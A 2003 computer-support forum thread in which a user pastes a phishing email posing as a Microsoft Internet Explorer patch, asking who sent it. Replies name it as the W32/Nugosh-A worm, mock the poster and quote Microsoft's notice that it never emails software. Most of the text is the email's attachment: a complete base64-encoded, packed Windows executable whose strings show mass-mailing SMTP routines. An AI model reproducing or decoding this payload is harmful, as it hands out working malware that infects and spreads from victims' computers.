Virus Alert

Discussion in 'Computer Support' started by Cheekycharlie, Aug 29, 2003.

  1. Hi,
    I recently received this email with an attachment that had a virus attached
    to it.
    Im not sure who it came from, but it certainly was not Microsoft.
    Can anyone here trace or track down who is sending these out and if so can
    anything be done about it?
    Thanks
    Michael
    Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    ([24.157.151.57] helo=localhost)
    by lutetium.btinternet.com with smtp (Exim 3.22 #23)
    id 19sokI-0000Ws-00
    for ; Fri, 29 Aug 2003 20:17:18 +0100
    From: "Microsoft" <>
    To: <>
    Subject: Use this patch immediately !
    MIME-Version: 1.0
    Content-Type: multipart/mixed;boundary="xxxx"
    Message-Id: <>
    Date: Fri, 29 Aug 2003 20:17:18 +0100
    Status:

    --xxxx
    Content-Type: text/plain;
    Content-Transfer-Encoding: 7bit

    Dear friend , use this Internet Explorer patch now!
    There are dangerous virus in the Internet now!
    More than 500.000 already infected!

    --xxxx
    Content-Type: application/download
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=patch.zl9

    TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0h
    kJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzIN
    CiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMA/Cw7qgAAAAAA
    AAAA4ACPgQsBAhkAIAAAABAAAABwAABAmwAAAIAAAACgAAAAAEAA
    ABAAAAACAAABAAAAAAAAAAMACgAAAAAAALAAAAAQAAAAAAAAAgAA
    AAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAAKAAABwB
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBY
    MAAAAAAAcAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQ
    WDEAAAAAACAAAACAAAAAHgAAAAQAAAAAAAAAAAAAAAAAAEAAAOBV
    UFgyAAAAAAAQAAAAoAAAAAIAAAAiAAAAAAAAAAAAAAAAAABAAADA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    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
    J+heWV/DvzeD2UyJFTiy8Pfx/JFv4UKLygkoDxmSBEGq6Bi4gTjy
    ZFLoalni2vwWsFzaDQrDFDPJSYvRf/v/L1oz26wywYrNiuqK1rYI
    ZtHrAthzCWY1IP/b//+DZoHzuO3+znXrM8gz00911fdG0VuLwsHA
    EGaL+78B+MFaWcNWNjB8Bzw5dwNB6/ReSmD9F36Za9IKrEkwA9Di
    9ZLDYGVdzWDd5niTC9qVZc9gn5qAIyd+2XQ0Dy+2KvJV6G6naIy3
    zGyHaAUkoREmXpvZzI8XRwtBZbMEdz3+CY9hw99AkZGRsQWorLCR
    kZGRtLi8xJGRkZHIzNDUkZGRkdjc4OSRkZGR6Ozw9FWAmZH4/ACg
    ULROcGGj1t1+99+JZG9zIHN0b3AHd2hvaXM2ADcAW/sDthh0K2Vn
    b2xkLRwmafsXkP1uZy5jb22iVVNFUiB3AThgvzVVTklDSyAdSk/W
    Pkg01kw5MTFsoSJWpkKAFU1EiSHADitrR3PUIBfZCAoR8aZrIH0V
    AxwEBwXG7ALcNQS9A00TQD0aCzV2IuwND2Y8QA8GrFleBEGgYBMR
    rhvCasRfHhssA5umaZo6SFRcaHhBmu41ZyOIklcDqLJpmqZpvMza
    5u7bNMum/ARCDBQeQmPiN64gS1dORUwzMqdZ46/yV1NPWAseoYOV
    /0V4aXRQcm9jZQ1UaKq23zjBQx1zZUhhbiplbmNfamwOcmNweZNT
    EWVw2W7kwRNsZW5DNnRlPUj/BWhKVGlja0NvdW5cbt/3pUdubmVj
    CmNXc3NrZWPlr/0NYmlgU2FjYylsP7WvtWlWVAlnIYZieW6dS9/e
    YW2DvEFTdGGsdXBbdretOB5fXG9hXmh0cyHvzbY2toFuIRXmZLN2
    bpNjdnZrfIiy2bBhXwD/v9kOEAaMKDA3ME4wUzBgMH8wnDCX+v//
    pjC7MB0xNzFKMXgwhTBvMb8yDzMhGzJD/////zJKMlEyeDKuMuwy
    CjNQM2wzhjOQM6YzwjPVM/EzBDQQ/////zQmNOU09TQKNRw1PzVF
    NUs1UTVXNV01YzVpNW81dTV7iP///zWBNYc1jTWTNZk1nzWlNas1
    sTW3Nb01wzXs/7vBYxgGpDOoM6wzszO3M7szAADgh4ooSEVMTyAt
    MMAFkWFs5qr9////TUFJTCBGUk9NOiA8YWRtaW5AZHVtYS5nb3Yu
    cnU+A3jd3yBSQ1BUIFRPHgAOILd35p0GUVVJVAJGcm9tHCJN7P/2
    22ljCHNvZnQiKHNlY3VyaXR5QG0Ug+0cMTU9VG9GU+C2NeB1Ymr8
    DVUrIHSX4P8vQ2F0Y2ggaW1tZWRpN2x57e3/2yAhJk1JTUUtVmVy
    c2lvbisxLjASBfyttUMJHQItVHlwZTq3bQm+cWx0aXABL2p4OTti
    rfu2BF1kDnk9IngAIi7bRvZ2oC0tCzkKeDTtB2x7cGxh8DsacmFu
    c2Zv7daI7S1FbrBk7Sc3YsiXoN1+RkRlViBm1TEgLC9Bd9ggdbZJ
    OHJ3IEV4dg/WbkxvcgvIbm93v1Rotdbc1hAoYQOUTAusa+6tnTF2
    aXIFWz9lPr45d7YvTUEXKyA1MDDdo7bW7QA7bCgvZhfY2wwv4SGL
    0WFtQyu0cIFvfSsvZE7biay1bo442mJhxTZohe2yNCJEz3Ct7rdu
    u0VsR3Rhx20XO/ZpbFgY64JlET3bLjllu9uWRViIAS4PXHdpdHv5
    fxsuBGcAXCouKgAuaHRtd2FiCTZzeRtsD2RieHRiE2QWshfWIzJD
    OkIMQlwIBrguAF7G3Jv9ADpTVFJdiEMQIC8qRtAghGrixpMQ4kRM
    TMFlZ0JcaBtBclMCfGNl3nR87g1cWyJFU6N3GsFkNKdcxly6GIaN
    G0VzXEPKcgWFiDbbOFxSYAA4QMHZ2NYzGmdAdy0A0m37GvoLLgJp
    H3Z4UC8Yg7WTYmUgDFqj3WitqG90zgFB196s2wV5nG0xRqQiEYQE
    hg0KCIKyVQARVpKkA2DZTASMUFEBb54NA74JbXBHbG9i57MW9GFs
    QWwfFmxlbg3or+JldFOjRGlyhKAxAN5vcjXeRlBA3jUZDERlbGW0
    O6ANZUlvVnJvbBCrOCABUwFG4ftmJWhOeyxbVFhIAO9vcA1OYW0R
    Zda62wseRm1tDUw3L80c0A9Ecml2ZfIO+7Llj4J0dHJpYnVzE1Np
    ekCWLWs/TW9kdQ5hE4ngm81lEaBBu+wNexbxdGSEspXX2htCIRBy
    l63YJbzCb0NaPWQaUMBubyUDcnPqS7aEGVNHURDM5wpdXVJSMfdT
    2YHFgHcrU+25oA9bE1BvaUoK7gvAD4oBaXa3oTXXOAgqF4pzb4QY
    xmazDmMKUEy73aEzx/1mM1huZyZfbN53cLNj8AjoCHcvNBtbMC4R
    QUuZ9NvbJehgT3CrS2V5c0EXcxFiDi4PDKJms7lbVuJ1ZRw0pjRS
    dIRgQfribm6azbUX3X+LI7IEBRfAdkN0mmM29wJwgKsFpWMF8AXg
    DcEBOyEEjOUBFgFjTriEADcIWAGEgEsIKwEVhBExuwEfHVlGJvn8
    LDuqjx4sQi6SCzCA8ivkL2AAALYFcAAAuICcDBQgHjjfG3Jg9wMk
    BrvIiB1gS0hOLjIiHXBOAtzvSFAbPGKWAAAANNIAEgAA/wAAAAAA
    AAAAAABgvgCAQACNvgCQ//9Xg83/6xCQkJCQkJCKBkaIB0cB23UH
    ix6D7vwR23LtuAEAAAAB23UHix6D7vwR2xHAAdtz73UJix6D7vwR
    23PkMcmD6ANyDcHgCIoGRoPw/3R0icUB23UHix6D7vwR2xHJAdt1
    B4seg+78EdsRyXUgQQHbdQeLHoPu/BHbEckB23PvdQmLHoPu/BHb
    c+SDwQKB/QDz//+D0QGNFC+D/fx2D4oCQogHR0l19+lj////kIsC
    g8IEiQeDxwSD6QR38QHP6Uz///9eife5NwEAAIoHRyzoPAF394A/
    AHXyiweKXwRmwegIwcAQhsQp+IDr6AHwiQeDxwWJ2OLZjb4AcAAA
    iwcJwHQ8i18EjYQwAJAAAAHzUIPHCP+WZJAAAJWKB0cIwHTciflX
    SPKuVf+WaJAAAAnAdAeJA4PDBOvh/5ZskAAAYelsc///AAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAIygAABkoAAAAAAAAAAAAAAAAAAA
    maAAAHSgAAAAAAAAAAAAAAAAAACmoAAAfKAAAAAAAAAAAAAAAAAA
    ALKgAACEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC+oAAAzKAAANyg
    AAAAAAAA6qAAAAAAAAD4oAAAAAAAABShAAAAAAAAS0VSTkVMMzIu
    RExMAEFEVkFQSTMyLmRsbAB3aW5pbmV0LmRsbABXU09DSzMyLmRs
    bAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQ
    cm9jZXNzAAAAUmVnQ2xvc2VLZXkAAABJbnRlcm5ldEdldENvbm5l
    Y3RlZFN0YXRlAAAAc2VuZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAABBsFgCmHxYAAAAAAAAAAAAAAAAAuAmE
    AFhsAAAAAAAA

    --xxxx




    ---
    Outgoing mail is certified Virus Free.
    Checked by AVG anti-virus system (http://www.grisoft.com).
    Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    Cheekycharlie, Aug 29, 2003
    #1
    1. Advertising

  2. Cheekycharlie

    Kraftee Guest

    Cheekycharlie wrote:
    > Hi,
    > I recently received this email with an attachment that had a virus
    > attached to it.
    > Im not sure who it came from, but it certainly was not Microsoft.


    YAWN......

    Keep up at the back there....

    --
    B-)
    Life is pain.....
    Deal with it!!
    Kraftee, Aug 29, 2003
    #2
    1. Advertising

  3. Cheekycharlie

    Mara Guest

    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.


    What it is, is W32/Nugosh-A. Where it came from is Rogers Cable Inc.. Report it
    to , and they'll handle it.

    "And please do not post virus code in 24HSHD again."

    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 29, 2003
    #3
  4. Cheekycharlie

    why? Guest

    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    Argh not another one....... your subject line is crap , 'Virus Alert'.
    You are not posting a virus alert, you are really asking 'Is this virus
    alert email real or a hoax?'

    Think about this, Microsoft sending out software with a virus? Wouldn't
    be the first time however.

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.
    >Im not sure who it came from, but it certainly was not Microsoft.
    >Can anyone here trace or track down who is sending these out and if so can
    >anything be done about it?
    >Thanks
    >Michael
    >Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    >([24.157.151.57] helo=localhost)
    > by lutetium.btinternet.com with smtp (Exim 3.22 #23)
    > id 19sokI-0000Ws-00
    > for ; Fri, 29 Aug 2003 20:17:18 +0100
    >From: "Microsoft" <>


    <snip>

    http://www.microsoft.com/security/
    see the link
    NOTICE: Microsoft never distributes software through e-mail

    Microsoft never distributes software directly via e-mail.
    * We distribute software on physical media like CD ROMs and floppy
    disks.
    * We distribute upgrades via the Internet. When we do this, the
    software will be available via our web site, http://www.microsoft.com,
    or through http://www.microsoft.com/downloads/search.asp?.
    * We occasionally send e-mail to customers to inform them that
    upgrades are available. However, the e-mail will only provide links to
    the download sites -- we will never attach the software itself to the
    e-mail. The links will always lead to either our web site or our FTP
    site, never to a third-party site.

    Me
    why?, Aug 29, 2003
    #4
  5. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:

    Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    bottom of the post says it's virus free.......

    >Hi,
    >I recently received this email with an attachment that had a virus attached
    >to it.
    >Im not sure who it came from, but it certainly was not Microsoft.

    <snip>
    >Dear friend , use this Internet Explorer patch now!
    >There are dangerous virus in the Internet now!
    >More than 500.000 already infected!
    >
    >--xxxx
    >Content-Type: application/download
    >Content-Transfer-Encoding: base64
    >Content-Disposition: attachment; filename=patch.zl9

    <snip the crap>
    >Outgoing mail is certified Virus Free.
    >Checked by AVG anti-virus system (http://www.grisoft.com).
    >Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    >

    So AVG missed this then.....

    Me
    why?, Aug 29, 2003
    #5
  6. No actually Avg saved it!
    And anyway if you know so much about this virus, which I dont suppose you
    do, why didnt you reply with a half decent answer.
    I know that Microsoft didnt send this virus, and I know now who did, but no
    thanks to you.
    All praise goes to MARA!
    CC:)
    "why?" <fgrirp*sgc@VAINY!Qznq.fpvragvfg.pbz> wrote in message
    news:...
    > X-No-Archive: Yes
    > On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:
    >
    > Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    > bottom of the post says it's virus free.......
    >
    > >Hi,
    > >I recently received this email with an attachment that had a virus

    attached
    > >to it.
    > >Im not sure who it came from, but it certainly was not Microsoft.

    > <snip>
    > >Dear friend , use this Internet Explorer patch now!
    > >There are dangerous virus in the Internet now!
    > >More than 500.000 already infected!
    > >
    > >--xxxx
    > >Content-Type: application/download
    > >Content-Transfer-Encoding: base64
    > >Content-Disposition: attachment; filename=patch.zl9

    > <snip the crap>
